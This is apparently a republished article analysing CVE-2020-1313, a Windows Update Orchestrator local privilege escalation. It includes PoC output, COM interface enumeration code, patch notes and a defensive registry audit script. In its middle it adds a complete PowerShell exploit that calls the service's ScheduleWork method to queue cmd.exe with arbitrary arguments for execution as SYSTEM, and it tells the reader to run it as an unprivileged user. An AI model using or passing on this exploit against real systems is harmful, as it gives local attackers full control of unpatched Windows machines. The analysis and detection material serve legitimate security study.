

How to analyze CVE-2020-1313 vulnerabilities and make use of PoC

2025-04-06 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

In this issue the editor walks through the analysis of CVE-2020-1313 and the use of its proof of concept. The material is covered from a practitioner's point of view; I hope you get something out of it.

The Windows Update Orchestrator Service is a DCOM service that other Windows components use to install downloaded Windows updates. Because the service performs privileged work on behalf of a caller without first impersonating (and thereby authenticating) that caller, it is vulnerable to privilege escalation: any local user can run code as NT AUTHORITY\SYSTEM. The vulnerability affects Windows 10 and Windows Server Core products.

Vulnerability analysis

The UniversalOrchestrator service (CLSID 9C695035-48D2-4229-8B73-4C70E756E519), implemented in usosvc.dll, runs as NT AUTHORITY\SYSTEM, and its COM access permissions are configured so that members of BUILTIN\Users may reach it. Although the service hides its COM class enumeration, the IUniversalOrchestrator interface (IID c53f3549-0dbf-429a-8297-c812ba00742d) can still be obtained through standard COM API calls. It exposes the following three methods:

    virtual HRESULT __stdcall HasMoratoriumPassed(wchar_t* uscheduledId, int64_t* p1);                                     // usosvc!UniversalOrchestrator::HasMoratoriumPassed
    virtual HRESULT __stdcall ScheduleWork(wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg); // usosvc!UniversalOrchestrator::ScheduleWork
    virtual HRESULT __stdcall WorkCompleted(wchar_t* uscheduledId, int64_t p1);                                            // usosvc!UniversalOrchestrator::WorkCompleted

ScheduleWork lets a caller register a command line that the service later executes in its own (SYSTEM) context, and the service performs no access check on the caller before accepting it. The executable itself must be digitally signed and must reside under c:\windows\system32 or Program Files, but the command-line arguments are not restricted. Scheduling c:\windows\system32\cmd.exe with attacker-chosen arguments is therefore enough to run arbitrary commands as NT AUTHORITY\SYSTEM.

Proof of concept (PoC)

    C:\111>whoami
    desktop-43rnlku\unprivileged

    C:\111>whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                          State
    ============================= ==================================== ========
    SeShutdownPrivilege           Shut down the system                 Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
    SeUndockPrivilege             Remove computer from docking station Disabled
    SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
    SeTimeZonePrivilege           Change the time zone                 Disabled

    C:\111>UniversalOrchestratorPrivEscPoc.exe
    Obtaining reference to IUniversalOrchestrator
    Scheduing work with id 56594
    Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.

The entry for the scheduled task is added under that registry key (the registry screenshot is not reproduced here).

The scheduled command then runs overnight (around 23:20) without any user interaction.
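As an added example (not the author's PoC, which is only shown through its output above), the following PowerShell script reaches the same interface via .NET COM interop and calls ScheduleWork, then reports the HRESULT so the host's exposure can be judged. The CLSID, IID, vtable order and parameter types are those listed in the analysis; that startArg and pauseArg are both plain argument strings for the scheduled command is an assumption, as are the work id and the marker command used.

```powershell
# Added example, not the original PoC: call IUniversalOrchestrator::ScheduleWork
# through a C# interface definition compiled on the fly with Add-Type.
$csharp = @'
using System;
using System.Runtime.InteropServices;

// Vtable layout as listed in the analysis: IUnknown, then these three methods in this order.
[ComImport]
[Guid("c53f3549-0dbf-429a-8297-c812ba00742d")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
public interface IUniversalOrchestrator
{
    [PreserveSig] int HasMoratoriumPassed([MarshalAs(UnmanagedType.LPWStr)] string uscheduledId, out long p1);
    [PreserveSig] int ScheduleWork([MarshalAs(UnmanagedType.LPWStr)] string uscheduledId,
                                   [MarshalAs(UnmanagedType.LPWStr)] string cmdLine,
                                   [MarshalAs(UnmanagedType.LPWStr)] string startArg,
                                   [MarshalAs(UnmanagedType.LPWStr)] string pauseArg);
    [PreserveSig] int WorkCompleted([MarshalAs(UnmanagedType.LPWStr)] string uscheduledId, long p1);
}

public static class UsoScheduler
{
    static readonly Guid ClsidUniversalOrchestrator = new Guid("9C695035-48D2-4229-8B73-4C70E756E519");

    // Returns the raw HRESULT of ScheduleWork so the caller can tell S_OK from a denial.
    public static int ScheduleWork(string id, string cmdLine, string startArg, string pauseArg)
    {
        Type t = Type.GetTypeFromCLSID(ClsidUniversalOrchestrator);  // activates the out-of-process service
        object obj = Activator.CreateInstance(t);
        IUniversalOrchestrator uso = (IUniversalOrchestrator)obj;    // the cast is a QueryInterface for the hidden IID
        try { return uso.ScheduleWork(id, cmdLine, startArg, pauseArg); }
        finally { Marshal.ReleaseComObject(obj); }
    }
}
'@
Add-Type -TypeDefinition $csharp

# Constructed input: a signed binary under System32 (the only kind of target the
# service accepts) plus a caller-controlled argument string, as the analysis describes.
# The marker command and the output path are assumptions for this example.
$id        = [string](Get-Random -Minimum 10000 -Maximum 99999)
$cmdLine   = 'C:\Windows\System32\cmd.exe'
$arguments = '/c whoami > C:\Windows\Temp\uso_poc.txt'

# startArg and pauseArg are both passed the same string (assumption about their meaning).
$hr = [UsoScheduler]::ScheduleWork($id, $cmdLine, $arguments, $arguments)
if ($hr -eq 0) {
    Write-Host ('ScheduleWork accepted work id {0}: the service did not impersonate the caller, host is exposed.' -f $id)
    Write-Host 'Look under HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler for the onboarded entry.'
} else {
    Write-Host ('ScheduleWork failed with HRESULT 0x{0:X8}: the call ran under the caller''s token, as expected on a patched host.' -f $hr)
}
```

Run it as an unprivileged user. S_OK means the work item was accepted and nothing more happens until the service's overnight window, at which point the marker command runs as SYSTEM. On a patched host the call should fail with a non-zero HRESULT; the page does not state which code the patched service returns, only that the registry write now happens under the caller's token.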

Vulnerability discovery process

When I found that the interface definitions of the USO service could not be obtained through OleView.NET, I wrote a script that brute-forced a large number of CLSID/IID combinations:

    void TestUpdateOrchestratorInterfaceAgainstService(IID& clsId, const char* className, const wchar_t* iidStr, const char* interfaceName) {
        void* ss = NULL;
        IID iid;
        ThrowOnError(IIDFromString(iidStr, (LPCLSID)&iid));
        // S_OK means the class answers QueryInterface for this IID; any other HRESULT
        // (usually E_NOINTERFACE) means it does not.
        HRESULT res = CoCreateInstance(clsId, nullptr, CLSCTX_LOCAL_SERVER, iid, (LPVOID*)&ss);
        printf("%s %s: %s\n", className, interfaceName, res == S_OK ? "WORKING" : "failure");
        if (res == S_OK) ((IUnknown*)ss)->Release();   // do not leak the proxy
    }

    void TestUpdateOrchestratorInterface(const wchar_t* iidStr, const char* interfaceName) {
        // TestUpdateOrchestratorInterfaceAgainstService(CLSID_AutomaticUpdates, "AutomaticUpdates", iidStr, interfaceName); // timeouting
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UxUpdateManager, "UxUpdateManager", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UsoService, "UsoService", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UpdateSessionOrchestrator, "UpdateSessionOrchestrator", iidStr, interfaceName);
        TestUpdateOrchestratorInterfaceAgainstService(CLSID_UniversalOrchestrator, "UniversalOrchestrator", iidStr, interfaceName);
        // TestUpdateOrchestratorInterfaceAgainstService(CLSID_SomeService, "SomeService", iidStr, interfaceName); // timeouting!
    }

    ...
    TestUpdateOrchestratorInterface(L"{c57692f8-8f5f-47cb-9381-34329b40285a}", "IMoUsoOrchestrator");
    TestUpdateOrchestratorInterface(L"{4284202d-4dc1-4c68-a21e-5c371dd92671}", "IMoUsoUpdate");
    TestUpdateOrchestratorInterface(L"{c879dd73-4bd2-4b76-9dd8-3b96113a2130}", "IMoUsoUpdateCollection");
    // ... and hundreds more

Running it over the hundreds of candidate IIDs produced the following hits:

    UniversalOrchestrator IUniversalOrchestrator: WORKING
    UpdateSessionOrchestrator IUpdateSessionOrchestrator: WORKING
    UxUpdateManager IUxUpdateManager: WORKING
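The same sweep, as an added PowerShell example rather than the author's C++ (this is not code from the original article): it activates each class once and then issues QueryInterface for every candidate IID through System.Runtime.InteropServices.Marshal, which is what CoCreateInstance with a non-default IID boils down to. Only the CLSID and IIDs that appear on this page are filled in; the CLSIDs of the other orchestrator classes are left as a comment for you to add.

```powershell
# Added example, not the author's script: brute-force which IIDs a CLSID supports.
$classes = @{
    'UniversalOrchestrator' = [Guid]'9C695035-48D2-4229-8B73-4C70E756E519'
    # UxUpdateManager, UsoService, UpdateSessionOrchestrator: add their CLSIDs here.
}
$interfaces = @{
    'IUniversalOrchestrator' = [Guid]'c53f3549-0dbf-429a-8297-c812ba00742d'
    'IMoUsoOrchestrator'     = [Guid]'c57692f8-8f5f-47cb-9381-34329b40285a'
    'IMoUsoUpdate'           = [Guid]'4284202d-4dc1-4c68-a21e-5c371dd92671'
    'IMoUsoUpdateCollection' = [Guid]'c879dd73-4bd2-4b76-9dd8-3b96113a2130'
}
$E_NOINTERFACE = 0x80004002   # PowerShell parses this literal as the Int32 HRESULT value

function Test-ComInterfaces {
    param([hashtable]$Classes, [hashtable]$Interfaces)
    $m = [System.Runtime.InteropServices.Marshal]
    foreach ($cls in $Classes.GetEnumerator()) {
        $obj = $null; $punk = [IntPtr]::Zero
        try {
            # CLSCTX_SERVER activation, so the out-of-process service is started just as
            # with CoCreateInstance. Some orchestrator classes hang here (the article's
            # "timeouting" ones), which is why they are commented out in the C++ version.
            $obj  = [Activator]::CreateInstance([Type]::GetTypeFromCLSID($cls.Value))
            $punk = $m::GetIUnknownForObject($obj)
        } catch {
            Write-Warning ('{0}: activation failed: {1}' -f $cls.Key, $_.Exception.Message)
            continue
        }
        foreach ($iface in $Interfaces.GetEnumerator()) {
            $iid = $iface.Value
            $ppv = [IntPtr]::Zero
            # QueryInterface returns S_OK (0) if the object implements the IID, E_NOINTERFACE otherwise.
            $hr  = $m::QueryInterface($punk, [ref]$iid, [ref]$ppv)
            if ($hr -eq 0)                  { $status = 'WORKING' }
            elseif ($hr -eq $E_NOINTERFACE) { $status = 'not supported' }
            else                            { $status = 'failure 0x{0:X8}' -f $hr }
            if ($ppv -ne [IntPtr]::Zero) { [void]$m::Release($ppv) }   # balance the AddRef done by QI
            [pscustomobject]@{ Class = $cls.Key; Interface = $iface.Key; Status = $status }
        }
        [void]$m::Release($punk)
        [void]$m::ReleaseComObject($obj)
    }
}

Test-ComInterfaces -Classes $classes -Interfaces $interfaces | Format-Table -AutoSize
```

On an unpatched host this reports IUniversalOrchestrator as WORKING for the UniversalOrchestrator class. The same is true on a patched host: the June 2020 fix adds impersonation inside the methods rather than hiding the interface, so this sweep tells you what is reachable, not whether the reachable methods are exploitable.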

I then reverse engineered the exposed methods and found the vulnerability described in this article.

Vulnerability repair

Microsoft fixed the issue in the June 2020 security update by adding a CoImpersonateClient call to the affected method.

Before the patch, the method was implemented as follows (the decompiled listing is not reproduced on this page):

After the patch, the implementation looks like this (the decompiled listing is not reproduced on this page):

The impersonation now happens at the very beginning of request handling, so the registry API calls that onboard the work item run in the caller's security context. A caller that lacks write access to that HKEY_LOCAL_MACHINE key can no longer complete the USO API call, and the method fails.
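Whether or not a host is patched, a responder will want to know what is currently onboarded under the UScheduler key the PoC output points to. The following PowerShell audit is an added example and not part of the original article. The key path is the one given above; the value names under each work item are not documented on this page, so every string value is inspected rather than a named one (an assumption), and the list of shells flagged generalises beyond the cmd.exe case the article uses.

```powershell
# Added example, not from the article: audit onboarded orchestrator work items.
function Get-UsoScheduledWork {
    param(
        [string]$Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler'
    )
    # The service only accepts signed binaries from these roots, per the analysis.
    $allowedRoots = @("$env:SystemRoot\System32", $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() + '\' }

    foreach ($item in Get-ChildItem -Path $Key -ErrorAction SilentlyContinue) {
        $props = Get-ItemProperty -Path $item.PSPath
        foreach ($p in $props.PSObject.Properties) {
            # Skip PowerShell's own PS* note properties and anything that is not a REG_SZ.
            if ($p.Name -like 'PS*' -or $p.Value -isnot [string]) { continue }
            # Crude command-line splitter: optionally quoted path ending in .exe, then the rest.
            if ($p.Value -notmatch '(?i)^\s*"?([^"]+?\.exe)"?\s*(.*)$') { continue }
            $exe  = $Matches[1].Trim().ToLowerInvariant()
            $rest = $Matches[2].Trim()

            $inAllowedRoot = [bool]($allowedRoots | Where-Object { $exe.StartsWith($_) })
            $signed = $false
            if (Test-Path -LiteralPath $exe) {
                $signed = (Get-AuthenticodeSignature -FilePath $exe).Status -eq 'Valid'
            }
            # cmd.exe is the vector from the article; the other shells are a generalisation.
            $isShell = $exe -match '\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$'

            [pscustomobject]@{
                WorkId     = $item.PSChildName
                ValueName  = $p.Name
                Executable = $exe
                Arguments  = $rest
                Suspicious = (-not $inAllowedRoot) -or (-not $signed) -or $isShell
            }
        }
    }
}

Get-UsoScheduledWork | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

A legitimately onboarded item points at a signed binary under System32 or Program Files, which is exactly the constraint the service enforces, so the interesting rows are those where the target is a command interpreter: the binary passes the signature and location checks, and the payload lives entirely in the Arguments column.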

That is the editor's walkthrough of the CVE-2020-1313 analysis and its PoC; if you have run into similar questions, the analysis above may help.


© 2024 shulou.com SLNews company. All rights reserved.
